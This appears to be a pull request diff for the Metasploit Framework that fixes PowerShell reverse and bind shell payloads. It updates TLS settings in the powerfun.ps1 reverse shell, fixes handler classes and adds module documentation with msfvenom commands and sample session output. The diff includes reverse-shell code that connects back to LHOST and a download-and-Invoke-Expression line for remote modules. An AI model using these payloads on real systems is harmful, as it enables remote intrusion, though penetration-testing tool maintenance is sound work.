### PR TITLE
fix #15804, fix powershell read_file on Windows Server 2012

### DIFF
--- a/data/exploits/powershell/powerfun.ps1
+++ b/data/exploits/powershell/powerfun.ps1
@@ -30,7 +30,7 @@ function powerfun
     if ($Sslcon -eq "true") 
     {
         $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
-        $sslStream.AuthenticateAsClient("LHOST_REPLACE") 
+        $sslStream.AuthenticateAsClient("LHOST_REPLACE",$null,"tls12",$false)
         $stream = $sslStream 
     }
 

--- a/data/exploits/powershell/powerfun.ps1
+++ b/data/exploits/powershell/powerfun.ps1
@@ -1,5 +1,3 @@
-# Powerfun - Written by Ben Turner & Dave Hardy
-
 function Get-Webclient 
 {
     $wc = New-Object -TypeName Net.WebClient
@@ -37,7 +35,7 @@ function powerfun
     }
 
     [byte[]]$bytes = 0..20000|%{0}
-    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
+    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) Microsoft Corporation. All rights reserved.`n`n")
     $stream.Write($sendbytes,0,$sendbytes.Length)
 
     if ($Download -eq "true")
@@ -49,9 +47,6 @@ function powerfun
             (Get-Webclient).DownloadString($module)|Invoke-Expression
         }
     }
-
-    $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
-    $stream.Write($sendbytes,0,$sendbytes.Length)
 
     while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
     {
@@ -69,6 +64,9 @@ function powerfun
         $stream.Flush()  
     }
     $client.Close()
+    if ($listener)
+    {
     $listener.Stop()
+    }
     }
 }

--- a/documentation/modules/payload/singles/cmd/windows/powershell_reverse_tcp.md
+++ b/documentation/modules/payload/singles/cmd/windows/powershell_reverse_tcp.md
@@ -1,0 +1,53 @@
+## Vulnerable Application
+
+This powershell payload is suitable for the following environments:
+
+* Windows 7
+* Windows Server 2012
+* Windows 10
+
+## Verification Steps
+
+1. Do: `use exploit/multi/handler`
+2. Do: `set payload cmd/windows/powershell_reverse_tcp`
+2. Do: `set LHOST [IP]`
+3. Do: `set LPORT [PORT]`
+4. Do: `run`
+
+## Scenarios
+
+### Generating a batch file with msfvenom
+
+```
+msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=192.168.0.2 LPORT=4444 -o powershell_reverse_tcp.bat
+```
+
+The output batch file can be executed directly on the target, or pasted as a command.
+
+### Example usage on Windows 7 target
+
+```
+msf6 > use exploit/multi/handler
+[*] Using configured payload generic/shell_reverse_tcp
+msf6 exploit(multi/handler) > set payload cmd/windows/powershell_reverse_tcp
+payload => cmd/windows/powershell_reverse_tcp
+msf6 exploit(multi/handler) > set LHOST 192.168.0.2
+LHOST => 192.168.0.2
+msf6 exploit(multi/handler) > set LPORT 4444
+LPORT => 4444
+msf6 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 192.168.0.2:4444
+[*] Powershell session session 1 opened (192.168.0.2:4444 -> 192.168.0.2:49106 ) at 2021-11-02 12:28:28 +0000
+
+User @ USER-PC
+PS C:\Users\User> exit
+[*] 192.168.0.2 - Powershell session session 1 closed.
+```
+
+## Options
+
+### LOAD_MODULES
+
+A list of powershell modules (separated by a commas) to download.
+

--- a/documentation/modules/payload/singles/cmd/windows/powershell_reverse_tcp_ssl.md
+++ b/documentation/modules/payload/singles/cmd/windows/powershell_reverse_tcp_ssl.md
@@ -2,9 +2,10 @@
 
 This powershell payload is suitable for the following environments:
 
+* Windows 2012
 * Windows 10
 
-Older versions of Windows (Windows 7, Windows Server 2012) may have issues establishing the SSL connection.
+Older versions of Windows (e.g Windows 7) may have issues establishing the SSL connection.
 For these versions using the non-SSL payload (cmd/windows/powershell_reverse_tcp) is recommended.
 
 ## Verification Steps

--- a/documentation/modules/payload/singles/cmd/windows/powershell_reverse_tcp_ssl.md
+++ b/documentation/modules/payload/singles/cmd/windows/powershell_reverse_tcp_ssl.md
@@ -1,0 +1,56 @@
+## Vulnerable Application
+
+This powershell payload is suitable for the following environments:
+
+* Windows 10
+
+Older versions of Windows (Windows 7, Windows Server 2012) may have issues establishing the SSL connection.
+For these versions using the non-SSL payload (cmd/windows/powershell_reverse_tcp) is recommended.
+
+## Verification Steps
+
+1. Do: `use exploit/multi/handler`
+2. Do: `set payload cmd/windows/powershell_reverse_tcp_ssl`
+2. Do: `set LHOST [IP]`
+3. Do: `set LPORT [PORT]`
+4. Do: `run`
+
+## Scenarios
+
+### Generating a batch file with msfvenom
+
+```
+msfvenom -p cmd/windows/powershell_reverse_tcp_ssl LHOST=192.168.0.2 LPORT=4444 -o powershell_reverse_tcp_ssl.bat
+```
+
+The output batch file can be executed directly on the target, or pasted as a command.
+
+### Example usage on Windows 10 target
+
+```
+msf6 > use exploit/multi/handler
+[*] Using configured payload generic/shell_reverse_tcp
+msf6 exploit(multi/handler) > set payload cmd/windows/powershell_reverse_tcp_ssl
+payload => cmd/windows/powershell_reverse_tcp_ssl
+msf6 exploit(multi/handler) > set LHOST 192.168.0.2
+LHOST => 192.168.0.2
+msf6 exploit(multi/handler) > set LPORT 4444
+LPORT => 4444
+msf6 exploit(multi/handler) > run
+[*] Started reverse SSL handler on 192.168.0.2:4444
+[*] Powershell session session 1 opened (192.168.0.2:4444 -> 192.168.0.2:49736 ) at 2021-11-02 13:01:28 +0000
+
+msf6 exploit(multi/handler) > sessions 1
+[*] Starting interaction with 1...
+
+User @ DESKTOP-5E3GRS6
+PS C:\Users\User> exit
+[*] 192.168.0.2 - Powershell session session 1 closed.
+```
+
+## Options
+
+### LOAD_MODULES
+
+A list of powershell modules (separated by a commas) to download.
+

--- a/lib/msf/base/sessions/powershell.rb
+++ b/lib/msf/base/sessions/powershell.rb
@@ -1,13 +1,14 @@
 # -*- coding: binary -*-
 
 class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
+
   #
   # Execute any specified auto-run scripts for this session
   #
   def process_autoruns(datastore)
 
     # Read the username and hostname from the initial banner
-    initial_output = shell_read(-1, 0.01)
+    initial_output = shell_read(-1, 2)
     if initial_output =~ /running as user ([^\s]+) on ([^\s]+)/
       username = $1
       hostname = $2

--- a/lib/msf/base/sessions/powershell.rb
+++ b/lib/msf/base/sessions/powershell.rb
@@ -6,12 +6,11 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
   # Execute any specified auto-run scripts for this session
   #
   def process_autoruns(datastore)
-
     # Read the username and hostname from the initial banner
     initial_output = shell_read(-1, 2)
     if initial_output =~ /running as user ([^\s]+) on ([^\s]+)/
-      username = $1
-      hostname = $2
+      username = Regexp.last_match(1)
+      hostname = Regexp.last_match(2)
       self.info = "#{username} @ #{hostname}"
     elsif initial_output
       self.info = initial_output.gsub(/[\r\n]/, ' ')
@@ -20,25 +19,26 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
     # Call our parent class's autoruns processing method
     super
   end
+
   #
   # Returns the type of session.
   #
   def self.type
-    "powershell"
+    'powershell'
   end
 
   #
   # Returns the session platform.
   #
   def platform
-    "windows"
+    'windows'
   end
 
   #
   # Returns the session description.
   #
   def desc
-    "Powershell session"
+    'Powershell session'
   end
 
   #
@@ -54,21 +54,22 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
 
     etime = ::Time.now.to_f + timeout
 
-    buff = ""
+    buff = ''
     # Keep reading data until the marker has been received or the 30 minture timeout has occured
     while (::Time.now.to_f < etime)
       res = shell_read(-1, timeout)
       break unless res
+
       timeout = etime - ::Time.now.to_f
 
       buff << res
-      if buff.include?(endm)
-        # if you see the end marker, read the buffer from the start marker to the end and then display back to screen
-        buff = buff.split(/#{strm}\r\n/)[-1]
-        buff = buff.split(endm)[0]
-        buff.gsub!(/(?<=\r\n)PS [^>]*>/, '')
-        return buff
-      end
+      next unless buff.include?(endm)
+
+      # if you see the end marker, read the buffer from the start marker to the end and then display back to screen
+      buff = buff.split(/#{strm}\r\n/)[-1]
+      buff = buff.split(endm)[0]
+      buff.gsub!(/(?<=\r\n)PS [^>]*>/, '')
+      return buff
     end
     buff
   end

--- a/lib/msf/core/payload/windows/powershell.rb
+++ b/lib/msf/core/payload/windows/powershell.rb
@@ -23,7 +23,7 @@ module Payload::Windows::Powershell
 
     if conntype == "Bind"
       script_in << "\npowerfun -Command bind"
-    elsif conntype == "Ssl"
+    elsif conntype == "SSL"
       script_in << "\npowerfun -Command reverse -Sslcon true"
     elsif conntype == "Reverse"
       script_in << "\npowerfun -Command reverse"

--- a/lib/msf/core/payload/windows/powershell.rb
+++ b/lib/msf/core/payload/windows/powershell.rb
@@ -10,6 +10,20 @@ module Msf
 
 module Payload::Windows::Powershell
 
+  def initialize(info = {})
+    ret = super(info)
+
+    # Register command execution options
+    register_options(
+      [
+        OptString.new('LOAD_MODULES', [ false, 'A list of powershell modules separated by a comma to download over the web', nil ]),
+      ]
+    )
+    # Hide the CMD option
+    deregister_options('CMD')
+    ret
+  end
+
   def generate_powershell_code(conntype)
     lport = datastore['LPORT']
     lhost = datastore['LHOST']

--- a/lib/msf/core/payload/windows/powershell.rb
+++ b/lib/msf/core/payload/windows/powershell.rb
@@ -23,8 +23,10 @@ module Payload::Windows::Powershell
 
     if conntype == "Bind"
       script_in << "\npowerfun -Command bind"
-    elsif conntype == "Reverse"
+    elsif conntype == "Ssl"
       script_in << "\npowerfun -Command reverse -Sslcon true"
+    elsif conntype == "Reverse"
+      script_in << "\npowerfun -Command reverse"
     end
 
     if datastore['LOAD_MODULES']

--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -648,16 +648,16 @@ module Msf::Post::File
     else
       file_mode = 'Create'
     end
-    pwsh_code = %($encoded=\"#{encoded_chunk}\";
-    $mstream = [System.IO.MemoryStream]::new([System.Convert]::FromBase64String($encoded));
-    $reader = [System.IO.StreamReader]::new([System.IO.Compression.GZipStream]::new($mstream,[System.IO.Compression.CompressionMode]::Decompress));
-    $filename = [System.IO.File]::Open('#{file_name}', [System.IO.FileMode]::#{file_mode})
-    $file_bytes=[System.Byte[]]::CreateInstance([System.Byte],#{length});
-    $reader.BaseStream.Read($file_bytes,0,$file_bytes.Length);
-    $filename.Write($file_bytes, 0, $file_bytes.Length);
-    $filename.Close();
-    $mstream.Close();
-    $reader.Close();)
+    pwsh_code = <<~PSH
+      $encoded='#{encoded_chunk}';
+      $gzip_bytes=[System.Convert]::FromBase64String($encoded);
+      $mstream = New-Object System.IO.MemoryStream(,$gzip_bytes);
+      $gzipstream = New-Object System.IO.Compression.GzipStream $mstream, ([System.IO.Compression.CompressionMode]::Decompress);
+      $filestream = [System.IO.File]::Open('#{file_name}', [System.IO.FileMode]::#{file_mode});
+      $gzipstream.CopyTo($filestream);
+      $filestream.Close();
+      $gzipstream.Close();
+    PSH
     cmd_exec(pwsh_code)
   end
 
@@ -677,12 +677,15 @@ module Msf::Post::File
   end
 
   def _read_file_powershell_fragment(filename, chunk_size, offset = 0)
-    b64_data = cmd_exec("$mstream = [System.IO.MemoryStream]::new();\
-      $gzipstream = [System.IO.Compression.GZipStream]::new($mstream, [System.IO.Compression.CompressionMode]::Compress);\
-      $get_bytes = [System.IO.File]::ReadAllBytes(\"#{filename}\")[#{offset}..#{offset + chunk_size - 1}];\
-      $gzipstream.Write($get_bytes, 0 , $get_bytes.Length);\
-      $gzipstream.Close();\
-      [Convert]::ToBase64String($mstream.ToArray())")
+    pwsh_code = <<~PSH
+      $mstream = New-Object System.IO.MemoryStream;
+      $gzipstream = New-Object System.IO.Compression.GZipStream($mstream, [System.IO.Compression.CompressionMode]::Compress);
+      $get_bytes = [System.IO.File]::ReadAllBytes(\"#{filename}\")[#{offset}..#{offset + chunk_size - 1}];
+      $gzipstream.Write($get_bytes, 0, $get_bytes.Length);
+      $gzipstream.Close();
+      [Convert]::ToBase64String($mstream.ToArray());
+    PSH
+    b64_data = cmd_exec(pwsh_code)
     return nil if b64_data.empty?
 
     uncompressed_fragment = Zlib::GzipReader.new(StringIO.new(Base64.decode64(b64_data))).read

--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -654,7 +654,9 @@ module Msf::Post::File
       $mstream = New-Object System.IO.MemoryStream(,$gzip_bytes);
       $gzipstream = New-Object System.IO.Compression.GzipStream $mstream, ([System.IO.Compression.CompressionMode]::Decompress);
       $filestream = [System.IO.File]::Open('#{file_name}', [System.IO.FileMode]::#{file_mode});
-      $gzipstream.CopyTo($filestream);
+      $file_bytes=[System.Byte[]]::CreateInstance([System.Byte],#{length});
+      $gzipstream.Read($file_bytes,0,$file_bytes.Length);
+      $filestream.Write($file_bytes,0,$file_bytes.Length);
       $filestream.Close();
       $gzipstream.Close();
     PSH
@@ -683,7 +685,7 @@ module Msf::Post::File
       $get_bytes = [System.IO.File]::ReadAllBytes(\"#{filename}\")[#{offset}..#{offset + chunk_size - 1}];
       $gzipstream.Write($get_bytes, 0, $get_bytes.Length);
       $gzipstream.Close();
-      [Convert]::ToBase64String($mstream.ToArray());
+      [System.Convert]::ToBase64String($mstream.ToArray());
     PSH
     b64_data = cmd_exec(pwsh_code)
     return nil if b64_data.empty?

--- a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb
+++ b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb
@@ -21,7 +21,7 @@ module MetasploitModule
           'Dave Hardy' # davehardy20
         ],
       'References'    => [
-          ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
+          ['URL', 'https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit/']
         ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'windows',
@@ -31,9 +31,6 @@ module MetasploitModule
       'RequiredCmd'   => 'generic',
       'Payload'       => { 'Payload' => '' }
       ))
-      register_options( [
-        OptString.new('LOAD_MODULES', [ false, "A list of powershell modules separated by a comma to download over the web", nil ]),
-      ])
   end
 
   def generate

--- a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb
@@ -22,7 +22,7 @@ module MetasploitModule
           'Dave Hardy' # davehardy20
         ],
         'References' => [
-          ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
+          ['URL', 'https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit/']
         ],
         'License' => MSF_LICENSE,
         'Platform' => 'windows',

--- a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb
@@ -36,11 +36,6 @@ module MetasploitModule
         }
       )
     )
-    register_options(
-      [
-        OptString.new('LOAD_MODULES', [ false, 'A list of powershell modules separated by a comma to download over the web', nil ]),
-      ]
-    )
   end
 
   def generate

--- a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb
@@ -5,7 +5,6 @@
 require 'rex/powershell'
 
 module MetasploitModule
-
   CachedSize = :dynamic
 
   include Msf::Payload::Single
@@ -13,37 +12,38 @@ module MetasploitModule
   include Msf::Payload::Windows::Powershell
 
   def initialize(info = {})
-    super(merge_info(info,
-      'Name'          => 'Windows Interactive Powershell Session, Reverse TCP',
-      'Description'   => 'Interacts with a powershell session on an established socket connection',
-      'Author'        =>
-        [
+    super(
+      merge_info(
+        info,
+        'Name' => 'Windows Interactive Powershell Session, Reverse TCP',
+        'Description' => 'Interacts with a powershell session on an established socket connection',
+        'Author' => [
           'Ben Turner', # benpturner
           'Dave Hardy' # davehardy20
         ],
-      'References'    =>
-        [
+        'References' => [
           ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
         ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'windows',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Session'       => Msf::Sessions::PowerShell,
-      'RequiredCmd'   => 'generic',
-      'Payload'       =>
-        {
-          'Offsets' => { },
+        'License' => MSF_LICENSE,
+        'Platform' => 'windows',
+        'Arch' => ARCH_CMD,
+        'Handler' => Msf::Handler::ReverseTcp,
+        'Session' => Msf::Sessions::PowerShell,
+        'RequiredCmd' => 'generic',
+        'Payload' => {
+          'Offsets' => {},
           'Payload' => ''
         }
-      ))
-      register_options(
+      )
+    )
+    register_options(
       [
-        OptString.new('LOAD_MODULES', [ false, "A list of powershell modules separated by a comma to download over the web", nil ]),
-      ])
+        OptString.new('LOAD_MODULES', [ false, 'A list of powershell modules separated by a comma to download over the web', nil ]),
+      ]
+    )
   end
 
   def generate
-    generate_powershell_code("Reverse")
+    generate_powershell_code('Reverse')
   end
 end

--- a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp_ssl.rb
@@ -22,7 +22,7 @@ module MetasploitModule
           'Dave Hardy' # davehardy20
         ],
         'References' => [
-          ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
+          ['URL', 'https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit/']
         ],
         'License' => MSF_LICENSE,
         'Platform' => 'windows',

--- a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp_ssl.rb
@@ -14,8 +14,8 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Windows Interactive Powershell Session, Reverse TCP',
-      'Description'   => 'Interacts with a powershell session on an established socket connection',
+      'Name'          => 'Windows Interactive Powershell Session, Reverse TCP SSL',
+      'Description'   => 'Interacts with a powershell session on an established SSL socket connection',
       'Author'        =>
         [
           'Ben Turner', # benpturner
@@ -28,7 +28,7 @@ module MetasploitModule
       'License'       => MSF_LICENSE,
       'Platform'      => 'windows',
       'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcp,
+      'Handler'       => Msf::Handler::ReverseTcpSsl,
       'Session'       => Msf::Sessions::PowerShell,
       'RequiredCmd'   => 'generic',
       'Payload'       =>
@@ -44,6 +44,6 @@ module MetasploitModule
   end
 
   def generate
-    generate_powershell_code("Reverse")
+    generate_powershell_code("SSL")
   end
 end

--- a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp_ssl.rb
@@ -36,11 +36,6 @@ module MetasploitModule
         }
       )
     )
-    register_options(
-      [
-        OptString.new('LOAD_MODULES', [ false, 'A list of powershell modules separated by a comma to download over the web', nil ]),
-      ]
-    )
   end
 
   def generate

--- a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp_ssl.rb
@@ -5,7 +5,6 @@
 require 'rex/powershell'
 
 module MetasploitModule
-
   CachedSize = :dynamic
 
   include Msf::Payload::Single
@@ -13,37 +12,38 @@ module MetasploitModule
   include Msf::Payload::Windows::Powershell
 
   def initialize(info = {})
-    super(merge_info(info,
-      'Name'          => 'Windows Interactive Powershell Session, Reverse TCP SSL',
-      'Description'   => 'Interacts with a powershell session on an established SSL socket connection',
-      'Author'        =>
-        [
+    super(
+      merge_info(
+        info,
+        'Name' => 'Windows Interactive Powershell Session, Reverse TCP SSL',
+        'Description' => 'Interacts with a powershell session on an established SSL socket connection',
+        'Author' => [
           'Ben Turner', # benpturner
           'Dave Hardy' # davehardy20
         ],
-      'References'    =>
-        [
+        'References' => [
           ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
         ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'windows',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcpSsl,
-      'Session'       => Msf::Sessions::PowerShell,
-      'RequiredCmd'   => 'generic',
-      'Payload'       =>
-        {
-          'Offsets' => { },
+        'License' => MSF_LICENSE,
+        'Platform' => 'windows',
+        'Arch' => ARCH_CMD,
+        'Handler' => Msf::Handler::ReverseTcpSsl,
+        'Session' => Msf::Sessions::PowerShell,
+        'RequiredCmd' => 'generic',
+        'Payload' => {
+          'Offsets' => {},
           'Payload' => ''
         }
-      ))
-      register_options(
+      )
+    )
+    register_options(
       [
-        OptString.new('LOAD_MODULES', [ false, "A list of powershell modules separated by a comma to download over the web", nil ]),
-      ])
+        OptString.new('LOAD_MODULES', [ false, 'A list of powershell modules separated by a comma to download over the web', nil ]),
+      ]
+    )
   end
 
   def generate
-    generate_powershell_code("SSL")
+    generate_powershell_code('SSL')
   end
 end

--- a/modules/payloads/singles/windows/powershell_bind_tcp.rb
+++ b/modules/payloads/singles/windows/powershell_bind_tcp.rb
@@ -6,7 +6,7 @@ require 'rex/powershell'
 
 ###
 #
-# Extends the Exec payload to add a new user.
+# Extends the Exec payload to run a powershell command
 #
 ###
 module MetasploitModule
@@ -28,7 +28,7 @@ module MetasploitModule
         ],
       'References'    =>
         [
-          ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
+          ['URL', 'https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit/']
         ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'win',
@@ -36,14 +36,6 @@ module MetasploitModule
       'Handler'       => Msf::Handler::BindTcp,
       'Session'       => Msf::Sessions::PowerShell,
       ))
-
-    # Register command execution options
-    register_options(
-      [
-        OptString.new('LOAD_MODULES', [ false, "A list of powershell modules separated by a comma to download over the web", nil ]),
-      ])
-    # Hide the CMD option...this is kinda ugly
-    deregister_options('CMD')
   end
 
   #

--- a/modules/payloads/singles/windows/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/powershell_reverse_tcp.rb
@@ -5,7 +5,6 @@
 require 'rex/powershell'
 
 module MetasploitModule
-
   CachedSize = :dynamic
 
   include Msf::Payload::Windows::Exec
@@ -13,30 +12,32 @@ module MetasploitModule
   include Rex::Powershell::Command
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'          => 'Windows Interactive Powershell Session, Reverse TCP',
-      'Description'   => 'Listen for a connection and spawn an interactive powershell session',
-      'Author'        =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Interactive Powershell Session, Reverse TCP',
+        'Description' => 'Listen for a connection and spawn an interactive powershell session',
+        'Author' => [
           'Ben Turner', # benpturner
           'Dave Hardy' # davehardy20
         ],
-      'References'    =>
-        [
+        'References' => [
           ['URL', 'https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit/']
         ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'win',
-      'Arch'          => ARCH_X86,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Session'       => Msf::Sessions::PowerShell,
-      ))
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => ARCH_X86,
+        'Handler' => Msf::Handler::ReverseTcp,
+        'Session' => Msf::Sessions::PowerShell
+      )
+    )
 
     # Register command execution options
     register_options(
       [
-        OptString.new('LOAD_MODULES', [ false, "A list of powershell modules separated by a comma to download over the web", nil ]),
-      ])
+        OptString.new('LOAD_MODULES', [ false, 'A list of powershell modules separated by a comma to download over the web', nil ]),
+      ]
+    )
     # Hide the CMD option...this is kinda ugly
     deregister_options('CMD')
   end
@@ -45,6 +46,6 @@ module MetasploitModule
   # Override the exec command string
   #
   def powershell_command
-    generate_powershell_code("Reverse")
+    generate_powershell_code('Reverse')
   end
 end

--- a/modules/payloads/singles/windows/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/powershell_reverse_tcp.rb
@@ -31,15 +31,6 @@ module MetasploitModule
         'Session' => Msf::Sessions::PowerShell
       )
     )
-
-    # Register command execution options
-    register_options(
-      [
-        OptString.new('LOAD_MODULES', [ false, 'A list of powershell modules separated by a comma to download over the web', nil ]),
-      ]
-    )
-    # Hide the CMD option...this is kinda ugly
-    deregister_options('CMD')
   end
 
   #

--- a/modules/payloads/singles/windows/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/powershell_reverse_tcp.rb
@@ -4,11 +4,6 @@
 ##
 require 'rex/powershell'
 
-###
-#
-# Extends the Exec payload to add a new user.
-#
-###
 module MetasploitModule
 
   CachedSize = :dynamic
@@ -28,12 +23,12 @@ module MetasploitModule
         ],
       'References'    =>
         [
-          ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
+          ['URL', 'https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit/']
         ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'win',
       'Arch'          => ARCH_X86,
-      'Handler'       => Msf::Handler::ReverseTcpSsl,
+      'Handler'       => Msf::Handler::ReverseTcp,
       'Session'       => Msf::Sessions::PowerShell,
       ))
 

--- a/modules/payloads/singles/windows/powershell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/windows/powershell_reverse_tcp_ssl.rb
@@ -1,0 +1,51 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'rex/powershell'
+
+module MetasploitModule
+  CachedSize = :dynamic
+
+  include Msf::Payload::Windows::Exec
+  include Msf::Payload::Windows::Powershell
+  include Rex::Powershell::Command
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Interactive Powershell Session, Reverse TCP SSL',
+        'Description' => 'Listen for a connection and spawn an interactive powershell session over SSL',
+        'Author' => [
+          'Ben Turner', # benpturner
+          'Dave Hardy' # davehardy20
+        ],
+        'References' => [
+          ['URL', 'https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit/']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => ARCH_X86,
+        'Handler' => Msf::Handler::ReverseTcpSsl,
+        'Session' => Msf::Sessions::PowerShell
+      )
+    )
+
+    # Register command execution options
+    register_options(
+      [
+        OptString.new('LOAD_MODULES', [ false, 'A list of powershell modules separated by a comma to download over the web', nil ]),
+      ]
+    )
+    # Hide the CMD option...this is kinda ugly
+    deregister_options('CMD')
+  end
+
+  #
+  # Override the exec command string
+  #
+  def powershell_command
+    generate_powershell_code('SSL')
+  end
+end

--- a/modules/payloads/singles/windows/powershell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/windows/powershell_reverse_tcp_ssl.rb
@@ -31,15 +31,6 @@ module MetasploitModule
         'Session' => Msf::Sessions::PowerShell
       )
     )
-
-    # Register command execution options
-    register_options(
-      [
-        OptString.new('LOAD_MODULES', [ false, 'A list of powershell modules separated by a comma to download over the web', nil ]),
-      ]
-    )
-    # Hide the CMD option...this is kinda ugly
-    deregister_options('CMD')
   end
 
   #

--- a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
@@ -6,11 +6,10 @@ require 'rex/powershell'
 
 ###
 #
-# Extends the Exec payload to add a new user.
+# Extends the Exec payload run a powershell command
 #
 ###
 module MetasploitModule
-
   CachedSize = :dynamic
 
   include Msf::Payload::Windows::Exec_x64
@@ -18,38 +17,31 @@ module MetasploitModule
   include Msf::Payload::Windows::Powershell
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'          => 'Windows Interactive Powershell Session, Bind TCP',
-      'Description'   => 'Listen for a connection and spawn an interactive powershell session',
-      'Author'        =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Interactive Powershell Session, Bind TCP',
+        'Description' => 'Listen for a connection and spawn an interactive powershell session',
+        'Author' => [
           'Ben Turner', # benpturner
           'Dave Hardy' # davehardy20
         ],
-      'References'    =>
-        [
-          ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
+        'References' => [
+          ['URL', 'https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit/']
         ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'win',
-      'Arch'          => ARCH_X64,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::PowerShell,
-      ))
-
-    # Register command execution options
-    register_options(
-      [
-        OptString.new('LOAD_MODULES', [ false, "A list of powershell modules separated by a comma to download over the web", nil ]),
-      ])
-    # Hide the CMD option...this is kinda ugly
-    deregister_options('CMD')
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => ARCH_X64,
+        'Handler' => Msf::Handler::BindTcp,
+        'Session' => Msf::Sessions::PowerShell
+      )
+    )
   end
 
   #
   # Override the exec command string
   #
   def powershell_command
-    generate_powershell_code("Bind")
+    generate_powershell_code('Bind')
   end
 end

--- a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
@@ -5,7 +5,6 @@
 require 'rex/powershell'
 
 module MetasploitModule
-
   CachedSize = :dynamic
 
   include Msf::Payload::Windows::Exec_x64
@@ -13,30 +12,32 @@ module MetasploitModule
   include Rex::Powershell::Command
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'          => 'Windows Interactive Powershell Session, Reverse TCP',
-      'Description'   => 'Listen for a connection and spawn an interactive powershell session',
-      'Author'        =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Interactive Powershell Session, Reverse TCP',
+        'Description' => 'Listen for a connection and spawn an interactive powershell session',
+        'Author' => [
           'Ben Turner', # benpturner
           'Dave Hardy' # davehardy20
         ],
-      'References'    =>
-        [
+        'References' => [
           ['URL', 'https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit/']
         ],
